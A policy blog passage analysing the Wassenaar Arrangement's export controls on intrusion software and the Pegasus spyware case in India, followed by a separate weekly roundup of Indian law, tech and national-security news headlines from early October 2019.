The Wassenaar Arrangement on Export Controls for Conventional Arms and Dual-Use Goods and Technologies (WA) exists for this precise reason. Established in 1996 and voluntary / non-binding in nature[I], its stated mission is “to contribute to regional and international security and stability, by promoting transparency and greater responsibility in transfers of conventional arms and dual-use goods and technologies, thus preventing destabilizing accumulations.”[ii] Military advancements across the globe, significant among which were the Indian and Pakistani nuclear tests, rocket tests by India and South Korea and the use of chemical warfare during the Iran-Iraq war, were all catalysts in the formulation of this multilateral attempt to regulate the transfer of advanced technologies capable of being weaponized.[iii] With more and more incidents coming to light of authoritarian regimes utilizing advanced western technology to violate human rights, the WA was amended to bring within its ambit “intrusion software” and “IP network surveillance systems” as well. 

Wassenaar: A General Outline

With a current membership of 42 countries (India being the latest to join in late 2017), the WA is the successor to the cold war-era Coordinating Committee for Multilateral Export Controls (COCOM) which had been established by the Western Bloc in order to prevent weapons and technology exports to the Eastern Bloc or what was then known as the Soviet Union.[iv] However, unlike its predecessor, the WA does not target any nation-state, and its members cannot exercise any veto power over other member’s export decisions.[v] Notably, while Russia is a member, Israel and China are not.

The WA lists out the different technologies in the form of “Control Lists” primarily consisting of the “List of Dual-Use Goods and Technologies” or the Basic List, and the “Munitions List”.[vi] The term “dual-use technology” typically refers to technology that can be used for both civilian and military purposes.[vii] The Basic List consists of ten categories[viii]

  • Special Materials and Related Equipment (Category 1); 
  • Materials Processing (Category 2); 
  • Electronics (Category 3); 
  • Computers (Category 4); 
  • Telecommunications (Category 5, Part 1); 
  • Information Security (Category 5, Part 2); 
  • Sensors and Lasers (Category 6); 
  • Navigation and Avionics (Category 7); 
  • Marine (Category 8); 
  • Aerospace and Propulsion (Category 9). 

Additionally, the Basic List also has the Sensitive and Very Sensitive Lists which include technologies covering radiation, submarine technology, advanced radar, etc. 

An outline of the WA’s principles is provided in its Guidelines & Procedures, including the Initial Elements. Typically, participating countries enforce controls on transfer of the listed items by enacting domestic legislation requiring licenses for export of these items and are also expected to ensure that the exports “do not contribute to the development or enhancement of military capabilities which undermine these goals, and are not diverted to support such capabilities.[ix]

While the Guidelines & Procedures document does not expressly proscribe the export of the specified items to non-WA countries, members are expected to notify other participants twice a year if a license under the Dual List is denied for export to any non-WA country.[x]

Amid concerns of violation of civil liberties

Unlike conventional weapons, cyberspace and information technology is one of those sectors where the government does not yet have a monopoly in expertise. In what can only be termed a “cyber-arms race”, it would be fair to say that most governments are even now busily acquiring technology from private companies to enhance their cyber-capacity, which includes surveillance technology for intelligence-gathering efforts. This, by itself, is plain real-politik.

However, amid this weaponization of the cyberspace, there were growing concerns that this technology was being purchased by authoritarian or repressive governments for use against their citizens. For instance, Eagle, monitoring technology owned by Amesys (a unit of the French firm Bull SA), Boeing Co.’s internet-filtering Narus, and China’s ZTE Corp. all contributed to the surveillance efforts by Col. Gaddafi’s regime in Libya. Surveillance technology equipment sold by Siemens AG and maintained by Nokia Siemens Networks were used against human rights activists in Bahrain. These instances, as part of a wider pattern that came to the spotlight, galvanized the WA countries in 2013 to include “intrusion software” and “IP network surveillance systems” in the Control List to attempt to limit the transfer of these technologies to known repressive regimes. 

Unexpected Consequences

The 2013 Amendment to the Control Lists was the subject of severe criticism by tech companies and civil society groups across the board. While the intention behind it was recognized as laudable, the terms “intrusion software” and “IP network surveillance system” were widely viewed as over-broad and having the unintended consequence of looping in both legitimate as well as illegitimate use of technology. The problems pointed out by cybersecurity experts are manifold and are a result of a misunderstanding of how cybersecurity works.

The inclusion of these terms, which was meant to regulate surveillance based on computer codes / programmes, also has the consequence of bringing within its ambit legitimate and often beneficial uses of these technologies, including even antivirus technology according to one view. Cybersecurity research and development often involves making use of “zero-day exploits” or vulnerabilities in the developed software, which when discovered and reported by any “bounty hunter”, is typically bought by the company owning the software. This helps the company immediately develop a “patch” for the reported vulnerability. These transactions are often necessarily cross-border. Experts complained that if directly transposed to domestic law, the changes would have a chilling effect on the vital exchange of information and research in this area, which was a major hurdle for advances in cybersecurity, making cyberspace globally less safer. A prime example is HewlettPackard’s (HP)  withdrawal from Pwn2Own—a computer hacking contest held annually at the PacSecWest security conference where contestants are challenged to hack into / exploit vulnerabilities on widely used software. HP, which sponsored the event, was forced to withdraw in 2015 citing the “complexity in obtaining real-time import /export licenses in countries that participate in the Wassenaar Arrangement”, among others. The member nation in this case was Japan.

After facing fierce opposition on its home soil, the United States decided to not implement the WA amendment and instead, decided to argue for a reversal at the next Plenary session of the WA, which failed. Other nations, including the EU and Japan have implemented the WA amendment export controls with varying degrees of success.

The Pegasus Hack, India and the Wassenaar

Considering many of the Indians identified as victims of the Pegasus hack were either journalists or human rights activists, with many of them being associated with the highly-contentious Bhima-Koregaon case, speculation is rife that the Indian government is among those purchasing and utilizing this kind of advanced surveillance technology to spy on its own citizens. Adding this to the NSO Group’s public statement that its “sole purpose” is to “provide technology to licensed government intelligence and law enforcement agencies to help them fight terrorism and serious crime”, it appears there are credible allegations that the Indian government was involved in the hack. The government’s evasiveness in responding and insistence on so-called “standard operating procedures” having been followed are less than reassuring.

While India’s entry to the WA as its 42nd member in 2018 has certainly elevated its status in the international arms control regime by granting it access to three of the world’s four main arms-control regimes (the others being the Nuclear Suppliers’ Group / NSG, the Missile Technology Control Group / MTCR and the Australia Group), the Pegasus Hack incident and the apparent connection to the Indian government shows us that its commitment to the principles underlying the WA is doubtful. The purpose of the inclusion of “intrusion software” and “IP network surveillance system” in the WA’s Control Lists by way of the 2013 Amendment, no matter their unintended consequences for legitimate uses of such technology, was to prevent governmental purchases exactly like this one. Hence, even though the WA does not prohibit the purchase of any surveillance technology from a non-member, the Pegasus incident arguably, is still a serious detraction from India’s commitment to the WA, even if not an explicit violation.

Military Cyber-Capability Vs Law Enforcement Cyber-Capability

Given what we know so far, it appears that highly sophisticated surveillance technology has also come into the hands of local law enforcement agencies. Had it been disclosed that the Pegasus software was being utilized by a military wing against external enemies, by, say, even the newly created Defence Cyber Agency, it would have probably caused fewer ripples. In fact, it might even have come off as reassuring evidence of the country’s advanced cyber-capabilities. However, the idea of such advanced, sophisticated technologies at the easy disposal of local law enforcement agencies is cause for worry. This is because while traditionally the domain of the military is external, the domain of law enforcement agencies is internal, i.e., the citizenry. There is tremendous scope for misuse by such authorities, including increased targeting of minorities. The recent incident of police officials in Hyderabad randomly collecting biometric data including their fingerprints and clicking people’s pictures only exacerbates this point. Even abroad, there already exist on-going efforts to limit the use of surveillance technologies by local law enforcement such as the police.

The conflation of technology use by both military and civil agencies  is a problem that is created in part at least, by the complex and often dual-use nature of technology. While dual use technology is recognized by the WA, this problem is not one that it is able to solve. As explained above, dual use technology is technology that can be used for both civil and military purposes. The demands of real-politik, increase in cyber-terrorism and the manifold ways in which a nation’s security can be compromised in cyberspace necessitate any government in today’s world to increase and improve its cyber-military-capacity by acquiring such technology. After all, a government that acquires surveillance technology undoubtedly increases the effectiveness of its intelligence gathering and ergo, its security efforts. But at the same time, the government also acquires the power to simultaneously spy on its own citizens, which can easily cascade into more targeted violations. 

Governments must resist the impulse to turn such technology on its own citizens. In the Indian scenario, citizens have been granted a ring of protection by way of the Puttaswamy judgement, which explicitly recognizes their right to privacy as a fundamental right. Interception and surveillance by the government while currently limited by laid-down protocols, are not regulated by any dedicated law. While there are calls for urgent legislation on the subject, few deal with the technology procurement processes involved. It has also now emerged that Chhattisgarh’s State Government has set up a panel to look into allegations that that NSO officials had a meeting with the state police a few years ago. This raises questions of oversight in the relevant authorities’ public procurement processes, apart from their legal authority to actually carry out domestic surveillance by exploiting zero-day vulnerabilities.  It is now becoming evident that any law dealing with surveillance will need to ensure transparency and accountability in the procurement of and use of the different kinds of invasive technology adopted by Central or State authorities to carry out such surveillance. 


[i]A Guide to the Wassenaar Arrangement, Daryl Kimball, Arms Control Association, December 9, 2013, https://www.armscontrol.org/factsheets/wassenaar, last accessed on November 27, 2019.

[ii]Ibid.

[iii]Data, Interrupted: Regulating Digital Surveillance Exports, Tim Maurerand Jonathan Diamond, November 24, 2015, World Politics Review.

[iv]Wassenaar Arrangement: The Case of India’s Membership, Rajeswari P. Rajagopalan and Arka Biswas, , ORF Occasional Paper #92 p.3, OBSERVER RESEARCH FOUNDATION, May 5, 2016, http://www.orfonline.org/wp-content/uploads/2016/05/ORF-Occasional-Paper_92.pdf, last accessed on November 27, 2019.

[v]Ibid, p. 3

[vi]“List of Dual-Use Goods and Technologies And Munitions List,” The Wassenaar Arrangement, available at https://www.wassenaar.org/public-documents/, last accessed on November 27, 2019. 

[vii]Article 2(1), Proposal for a REGULATION OF THE EUROPEAN PARLIAMENT AND OF THE COUNCIL setting up a Union regime for the control of exports, transfer, brokering, technical assistance and transit of dual-use items (recast), European Commission, September 28th, 2016, http://trade.ec.europa.eu/doclib/docs/2016/september/tradoc_154976.pdf, last accessed on November 27, 2019. 

[viii]supra note vi.

[ix]Guidelines & Procedures, including the Initial Elements, The Wassenaar Arrangement, December, 2016, http://www.wassenaar.org/wp- content/uploads/2016/12/Guidelines-and-procedures-including-the-Initial-Elements-2016.pdf, last accessed on November 27, 2019.

[x]Articles V(1) & (2), Guidelines & Procedures, including the Initial Elements, The Wassenaar Arrangement, December, 2016, https://www.wassenaar.org/public-documents/, last accessed on November 27, 2019.

[September 30-October 7] CCG’s Week in Review Curated News in Information Law and Policy

Huawei finds support from Indian telcos in the 5G rollout as PayPal withdrew from Facebook’s Libra cryptocurrency project; Foreign Portfolio Investors moved MeitY against in the Data Protection Bill; the CJEU rules against Facebook in case relating to takedown of content globally; and Karnataka joins list of states considering implementing NRC to remove illegal immigrants – presenting this week’s most important developments in law, tech and national security.

Digital India

  • [Sep 30] Why the imminent global economic slowdown is a growth opportunity for Indian IT services firms, Tech Circle report.
  • [Sep 30] Norms tightened for IT items procurement for schools, The Hindu report.
  • [Oct 1] Govt runs full throttle towards AI, but tech giants want to upskill bureaucrats first, Analytics India Magazine report.
  • [Oct 3] – presenting this week’s most important developments in law, tech and national security. MeitY launches smart-board for effective monitoring of the key programmes, The Economic Times report.
  • [Oct 3] “Use human not artificial intelligence…” to keep a tab on illegal constructions: Court to Mumbai civic body, NDTV report.
  • [Oct 3] India took 3 big productivity leaps: Nilekani, Livemint report.
  • [Oct 4] MeitY to push for more sops to lure electronic makers, The Economic Times report; Inc42 report.
  • [Oct 4] Core philosophy of Digital India embedded in Gandhian values: Ravi Shankar Prasad, Financial Express report.
  • [Oct 4] How can India leverage its data footprint? Experts weigh in at the India Economic Summit, Quartz report.
  • [Oct 4] Indians think jobs would be easy to find despite automation: WEF, Tech Circle report.
  • [Oct 4] Telangana govt adopts new framework to use drones for last-mile delivery, The Economic Times report.
  • [Oct 5] Want to see ‘Assembled in India’ on an iPhone: Ravi Shankar Prasad, The Economic Times report.
  • [Oct 6] Home market gets attractive for India’s IT giants, The Economic Times report.

Internet Governance

  • [Oct 2] India Govt requests maximum social media content takedowns in the world, Inc42 report; Tech Circle report.
  • [Oct 3] Facebook can be forced to delete defamatory content worldwide, top EU court rules, Politico EU report.
  • [Oct 4] EU ruling may spell trouble for Facebook in India, The Economic Times report.
  • [Oct 4] TikTok, TikTok… the clock is ticking on the question whether ByteDance pays its content creators, ET Tech report.
  • [Oct 6] Why data localization triggers a heated debate, The Economic Times report.
  • [Oct 7] Sensitive Indian govt data must be stored locally, Outlook report.

Data Protection and Privacy

  • [Sep 30] FPIs move MeitY against data bill, seek exemption, ET markets report, Inc42 report; Financial Express report.
  • [Oct 1] United States: CCPA exception approved by California legislature, Mondaq.com report.
  • [Oct 1] Privacy is gone, what we need is regulation, says Infosys Kris Gopalakrishnana, News18 report.
  • [Oct 1] Europe’s top court says active consent is needed for tracking cookies, Tech Crunch report.
  • [Oct 3] Turkey fines Facebook $282,000 over data privacy breach, Deccan Herald report.

Free Speech

  • [Oct 1] Singapore’s ‘fake news’ law to come into force Wednesday, but rights group worry it could stifle free speech, The Japan Times report.
  • [Oct 2] Minister says Singapore’s fake news law is about ‘enabling’ free speech, CNBC report.
  • [Oct 3] Hong Kong protests: Authorities to announce face mask ban, BBC News report.
  • [Oct 3] ECHR: Holocaust denial is not protected free speech, ASIL brief.
  • [Oct 4] FIR against Mani Ratnam, Adoor and 47 others who wrote to Modi on communal violence, The News Minute report; Times Now report.
  • [Oct 5] UN asks Malaysia to repeal laws curbing freedom of speech, The New Indian Express report.
  • [Oct 6] When will our varsities get freedom of expression: PC, Deccan Herald report.
  • [Oct 6] UK Government to make university students sign contracts limiting speech and behavior, The Times report.
  • [Oct 7] FIR on Adoor and others condemned, The Telegraph report.

Aadhaar, Digital IDs

  • [Sep 30] Plea in SC seeking linking of social media accounts with Aadhaar to check fake news, The Economic Times report.
  • [Oct 1] Why another omnibus national ID card?, The Hindu Business Line report.
  • [Oct 2] ‘Kenyan court process better than SC’s approach to Aadhaar challenge’: V Anand, who testified against biometric project, LiveLaw report.
  • [Oct 3] Why Aadhaar is a stumbling block in Modi govt’s flagship maternity scheme, The Print report.
  • [Oct 4] Parliament panel to review Aadhaar authority functioning, data security, NDTV report.
  • [Oct 5] Could Aahdaar linking stop GST frauds?, Financial Express report.
  • [Oct 6] Call for liquor sale-Aadhaar linking, The New Indian Express report.

Digital Payments, Fintech

  • [Oct 7] Vision cash-lite: A billion UPI transactions is not enough, Financial Express report.

Cryptocurrencies

  • [Oct 1] US SEC fines crypto company Block.one for unregistered ICO, Medianama report.
  • [Oct 1] South Korean Court issues landmark decision on crypto exchange hacking, Coin Desk report.
  • [Oct 2] The world’s most used cryptocurrency isn’t bitcoin, ET Markets report.
  • [Oct 2] Offline transactions: the final frontier for global crypto adoption, Coin Telegraph report.
  • [Oct 3] Betting on bitcoin prices may soon be deemed illegal gambling, The Economist report.
  • [Oct 3] Japan’s financial regulator issues draft guidelines for funds investing in crypto, Coin Desk report.
  • [Oct 3] Hackers launch widespread botnet attack on crypto wallets using cheap Russian malware, Coin Desk report.
  • [Oct 4] State-backed crypto exchange in Venezuela launches new crypto debit cards, Decrypt report.
  • [Oct 4] PayPal withdraws from Facebook-led Libra crypto project, Coin Desk report.
  • [Oct 5] Russia regulates digital rights, advances other crypto-related bills, Bitcoin.com report.
  • [Oct 5] Hong Kong regulates crypto funds, Decrypt report.

Cybersecurity and Cybercrime

  • [Sep 30] Legit-looking iPhone lightening cables that hack you will be mass produced and sold, Vice report.
  • [Sep 30] Blackberry launches new cybersecurity development labs, Infosecurity Mgazine report.
  • [Oct 1] Cybersecurity experts warn that these 7 emerging technologies will make it easier for hackers to do their jobs, Business Insider report.
  • [Oct 1] US government confirms new aircraft cybersecurity move amid terrorism fears, Forbes report.
  • [Oct 2] ASEAN unites to fight back on cyber crime, GovInsider report; Asia One report.
  • [Oct 2] Adopting AI: the new cybersecurity playbook, TechRadar Pro report.
  • [Oct 4] US-UK Data Access Agreement, signed on Oct 3, is an executive agreement under the CLOUD Act, Medianama report.
  • [Oct 4] The lack of cybersecurity talent is ‘a  national security threat,’ says DHS official, Tech Crunch report.
  • [Oct 4] Millions of Android phones are vulnerable to Israeli surveillance dealer attack, Forbes report; NDTV report.
  • [Oct 4] IoT devices, cloud solutions soft target for cybercriminals: Symantec, Tech Circle report.
  • [Oct 6] 7 cybersecurity threats that can sneak up on you, Wired report.
  • [Oct 6] No one could prevent another ‘WannaCry-style’ attack, says DHS official, Tech Crunch report.
  • [Oct 7] Indian firms rely more on automation for cybersecurity: Report, ET Tech report.

Cyberwarfare

  • [Oct 2] New ASEAN committee to implement norms for countries behaviour in cyberspace, CNA report.

Tech and National Security

  • [Sep 30] IAF ready for Balakot-type strike, says new chief Bhadauria, The Hindu report; Times of India report.
  • [Sep 30] Naval variant of LCA Tejas achieves another milestone during its test flight, Livemint report.
  • [Sep 30] SAAB wants to offer Gripen at half of Rafale cost, full tech transfer, The Print report.
  • [Sep 30] Rajnath harps on ‘second strike capability’, The Shillong Times report.
  • [Oct 1] EAM Jaishankar defends India’s S-400 missile system purchase from Russia as US sanctions threat, International Business Times report.
  • [Oct 1] SC for balance between liberty, national security, Hindustan Times report.
  • [Oct 2] Startups have it easy for defence deals up to Rs. 150 cr, ET Rise report, Swarajya Magazine report.
  • [Oct 3] Huawei-wary US puts more pressure on India, offers alternatives to data localization, The Economic Times report.
  • [Oct 4] India-Russia missile deal: What is CAATSA law and its implications?, Jagran Josh report.
  • [Oct 4] Army inducts Israeli ‘tank killers’ till DRDO develops new ones, Defence Aviation post report.
  • [Oct 4] China, Russia deepen technological ties, Defense One report.
  • [Oct 4] Will not be afraid of taking decisions for fear of attracting corruption complaints: Rajnath Singh, New Indian Express report.
  • [Oct 4] At conclave with naval chiefs of 10 countries, NSA Ajit Doval floats an idea, Hindustan Times report.
  • [Oct 6] Pathankot airbase to finally get enhanced security, The Economic Times report.
  • [Oct 6] rafale with Meteor and Scalp missiles will give India unrivalled combat capability: MBDA, The Economic Times report.
  • [Oct 7] India, Bangladesh sign MoU for setting up a coastal surveillance radar in Bangladesh, The Economic Times report; Decaan Herald report.
  • [Oct 7] Indian operated T-90 tanks to become Russian army’s main battle tank, EurAsian Times report.
  • [Oct 7] IAF’s Sukhois to get more advanced avionics, radar, Defence Aviation post report.

Tech and Law Enforcement

  • [Sep 30] TMC MP Mahua Mitra wants to be impleaded in the WhatsApp traceability case, Medianama report; The Economic Times report.
  • [Oct 1] Role of GIS and emerging technologies in crime detection and prevention, Geospatial World.net report.
  • [Oct 2] TRAI to take more time on OTT norms; lawful interception, security issue now in focus, The Economic Times report.
  • [Oct 2[ China invents super surveillance camera that can spot someone from a crowd of thousands, The Independent report.
  • [Oct 4] ‘Don’t introduce end-to-end encryption,’ UK, US and Australia ask Facebook in an open letter, Medianama report.
  • [Oct 4] Battling new-age cyber threats: Kerala Police leads the way, The Week report.
  • [Oct 7] India govt bid to WhatsApp decryption gets push as UK,US, Australia rally support, Entrackr report.

Tech and Elections

  • [Oct 1] WhatsApp was extensively exploited during 2019 elections in India: Report, Firstpost report.
  • [Oct 3] A national security problem without a parallel in American democracy, Defense One report.

Internal Security: J&K

  • [Sep 30] BDC polls across Jammu, Kashmir, Ladakh on Oct 24, The Economic Times report.
  • [Sep 30] India ‘invaded and occupied Kashmir, says Malaysian PM at UN General Assembly, The Hindu report.
  • [Sep 30] J&K police stations to have CCTV camera surveillance, News18 report.
  • [Oct 1] 5 judge Supreme court bench to hear multiple pleas on Article 370, Kashmir lockdown today, India Today report.
  • [Oct 1] India’s stand clear on Kashmir: won’t accept third-party mediation, India Today report.
  • [Oct 1] J&K directs officials to ensure all schools reopen by Thursday, NDTV report.
  • [Oct 2]] ‘Depressed, frightened’: Minors held in Kashmir crackdown, Al Jazeera report.
  • [Oct 3] J&K: When the counting of the dead came to a halt, The Hindu report.
  • [Oct 3] High schools open in Kashmir, students missing, The Economic Times report.
  • [Oct 3] Jaishanakar reiterates India’s claim over Pakistan-occupied Kashmir, The Hindu report.
  • [Oct 3] Normalcy prevails in Jammu and Kashmir, DD News report.
  • [Oct 3] Kashmiri leaders will be released one by one, India Today report.
  • [Oct 4] India slams Turkey, Malaysia remarks on J&K, The Hindu report.
  • [Oct 5] India’s clampdown hits Kashmir’s Silicon Valley, The Economic Times report.
  • [Oct 5] Traffic cop among 14 injured in grenade attack in South Kashmir, NDTV report; The Economic Times report.
  • [Oct 6] Kashmir situation normal, people happy with Article 370 abrogation: Prkash Javadekar, Times of India report.
  • [Oct 7] Kashmir residents say police forcibly taking over their homes for CRPF troops, Huffpost India report.

Internal Security: Northeast/ NRC

  • [Sep 30] Giving total control of Assam Rifles to MHA will adversely impact vigil: Army to Govt, The Economic Times report.
  • [Sep 30] NRC list impact: Assam’s foreigner tribunals to have 1,600 on contract, The Economic Times report.
  • [Sep 30] Assam NRC: Case against Wipro for rule violation, The Hindu report; News18 report; Scroll.in report.
  • [Sep 30] Hindu outfits demand NRC in Karnataka, Deccan Chronicle report; The Hindustan Times report.
  • [Oct 1] Centre extends AFPSA in three districts of Arunachal Pradesh for six months, ANI News report.
  • [Oct 1] Assam’s NRC: law schools launch legal aid clinic for excluded people, The Hindu report; Times of India report; The Wire report.
  • [Oct 1] Amit Shah in Kolkata: NRC to be implemented in West Bengal, infiltrators will be evicted, The Economic Times report.
  • [Oct 1] US Congress panel to focus on Kashmir, Assam, NRC in hearing on human rights in South Asia, News18 report.
  • [Oct 1] NRC must for national security; will be implemented: Amit Shah, The Hindu Business Line report.
  • [Oct 2] Bengali Hindu women not on NRC pin their hope on promise of another list, citizenship bill, The Print report.
  • [Oct 3] Citizenship Amendment Bill has become necessity for those left out of NRC: Assam BJP president Ranjeet Das, The Economic Times report.
  • [Oct 3] BJP govt in Karnataka mulling NRC to identify illegal migrants, The Economic Times report.
  • [Oct 3] Explained: Why Amit Shah wants to amend the Citizenship Act before undertaking countrywide NRC, The Indian Express report.
  • [Oct 4] Duplicating NPR, NRC to sharpen polarization: CPM, Deccan Herald report.
  • [Oct 5] We were told NRC India’s internal issue: Bangladesh, Livemint report.
  • [Oct 6] Prasanna calls NRC ‘unjust law’, The New Indian Express report.

National Security Institutions

  • [Sep 30] CRPF ‘denied’ ration cash: Govt must stop ‘second-class’ treatment. The Quint report.
  • [Oct 1] Army calls out ‘prejudiced’ foreign report on ‘torture’, refutes claim, Republic World report.
  • [Oct 2] India has no extraterritorial ambition, will fulfill regional and global security obligations: Bipin Rawat, The Economic Times report.

More on Huawei, 5G

  • [Sep 30] Norway open to Huawei supplying 5G equipment, Forbes report.
  • [Sep 30] Airtel deploys 100 hops of Huawei’s 5G technology, The Economic Times report.
  • [Oct 1] America’s answer to Huawei, Foreign Policy report; Tech Circle report.
  • [Oct 1] Huawei buys access to UK innovation with Oxford stake, Financial Times report.
  • [Oct 3] India to take bilateral approach on issues faced by other countries with China: Jaishankar, The Hindu report.
  • [Oct 4] Bharti Chairman Sunil Mittal says India should allow Huawei in 5G, The Economic Times report
  • [Oct 6] 5G rollout: Huawei finds support from telecom industry, Financial Express report.

Emerging Tech: AI, Facial Recognition

  • [Sep 30] Bengaluru set to roll out AI-based traffic solution at all signals, Entrackr report.
  • [Sep 1] AI is being used to diagnose disease and design new drugs, Forbes report.
  • [Oct 1] Only 10 jobs created for every 100 jobs taken away by AI, The Economic Times report.
  • [Oct 2]Emerging tech is helping companies grow revenues 2x: report, ET Tech report.
  • [Oct 2] Google using dubious tactics to target people with ‘darker skin’ in facial recognition project: sources, Daily News report.
  • [Oct 2] Three problems posed by deepfakes that technology won’t solve, MIT Technology Review report.
  • [Oct 3] Getting a new mobile number in China will involve a facial recognition test, Quartz report.
  • [Oct 4] Google contractors targeting homeless people, college students to collect their facial recognition data: Report, Medianama report.
  • [Oct 4] More jobs will be created than are lost from the IA revolution: WEF AI Head, Livemint report.
  • [Oct 6] IIT-Guwahati develops AI-based tool for electric vehicle motor, Livemint report.
  • [Oct 7] Even if China misuses AI tech, Satya Nadella thinks blocking China’s AI research is a bad idea, India Times report.

Big Tech

  • [Oct 3] Dial P for privacy: Google has three new features for users, Times of India report.

Opinions and Analyses

  • [Sep 26] Richard Stengel, Time, We’re in the middle of a global disinformation war. Here’s what we need to do to win.
  • [Sep 29] Ilker Koksal, Forbes, The shift toward decentralized finance: Why are financial firms turning to crypto?
  • [Sep 30] Nistula Hebbar, The Hindu, Govt. views grassroots development in Kashmir as biggest hope for peace.
  • [Sep 30] Simone McCarthy, South China Morning Post, Could China’s strict cyber controls gain international acceptance?
  • [Sep 30] Nele Achten, Lawfare blog, New UN Debate on cybersecurity in the context of international security.
  • [Sep 30[ Dexter Fergie, Defense One, How ‘national security’ took over America.
  • [Sep 30] Bonnie Girard, The Diplomat, A firsrhand account of Huawei’s PR drive.
  • [Oct 1] The Economic Times, Rafale: Past tense but furture perfect.
  • [Oct 1] Simon Chandler, Forbes, AI has become a tool for classifying and ranking people.
  • [Oct 2] Ajay Batra, Business World, Rethink India! – MMRCA, ESDM & Data Privacy Policy.
  • [Oct 2] Carisa Nietsche, National Interest, Why Europe won’t combat Huawei’s Trojan tech.
  • [Oct 3] Aruna Sharma, Financial Express, The digital way: growth with welfare.
  • [Oct 3] Alok Prasanna Kumar, Medianama, When it comes to Netflix, the Government of India has no chill.
  • [Oct 3] Fredrik Bussler, Forbes, Why we need crypto for good.
  • [Oct 3] Panos Mourdoukoutas, Forbes, India changed the game in Kashmir – Now what?
  • [Oct 3] Grant Wyeth, The Diplomat, The NRC and India’s unfinished partition.
  • [Oct 3] Zak Doffman, Forbes, Is Huawei’s worst Google nightmare coming true?
  • [Oct 4] Oren Yunger, Tech Crunch, Cybersecurity is a bubble, but it’s not ready to burst.
  • [Oct 4] Minakshi Buragohain, Indian Express, NRS: Supporters and opposers must engage each other with empathy.
  • [Oct 4] Frank Ready, Law.com, 27 countries agreed on ‘acceptable’ cyberspace behavior. Now comes the hard part.
  • [Oct 4] Samir Saran, World economic Forum (blog), 3 reasons why data is not the new oil and why this matters to India.
  • [Oct 4] Andrew Marantz, The New York Times, Free Speech is killing us.
  • [Oct 4] Financial Times editorial, ECJ ruling risks for freedom of speech online.
  • [Oct 4] George Kamis, GCN, Digital transformation requires a modern approach to cybersecurity.
  • [Oct 4] Naomi Xu Elegant and Grady McGregor, Fortune, Hong King’s mask ban pits anonymity against the surveillance state.
  • [Oct 4] Prashanth Parameswaran, The Diplomat, What’s behind the new US-ASEAN cyber dialogue?
  • [Oct 5] Huong Le Thu, The Strategist, Cybersecurity and geopolitics: why Southeast Asia is wary of a Huawei ban.
  • [Oct 5] Hannah Devlin, The Guardian, We are hurtling towards a surveillance state: the rise of facial recognition technology.
  • [Oct 5] PV Navaneethakrishnan, The Hindu Why no takers? (for ME/M.Tech programmes).
  • [Oct 6] Aakar Patel, Times of India blog, Cases against PC, letter-writing celebs show liberties are at risk.
  • [Oct 6] Suhasini Haidar, The Hindu, Explained: How ill purchases from Russia affect India-US ties?
  • [Oct 6] Sumit Chakraberty, Livemint, Evolution of business models in the era of privacy by design.
  • [Oct 6] Spy’s Eye, Outlook, Insider threat management.
  • [Oct 6] Roger Marshall, Deccan Herald, Big oil, Big Data and the shape of water.
  • [Oct 6] Neil Chatterjee, Fortune, The power grid is evolving. Cybersecurity  must too.
  • [Oct 7] Scott W Pink, Modaq.com, EU: What is GDPR and CCPA and how does it impact blockchain?
  • [Oct 7] GN Devy, The Telegraph, Has India slid into an irreversible Talibanization of the mind?
  • [Oct 7] Susan Ariel Aaronson, South China Morning Post, The Trump administration’s approach to AI is not that smart: it’s about cooperation, not domination.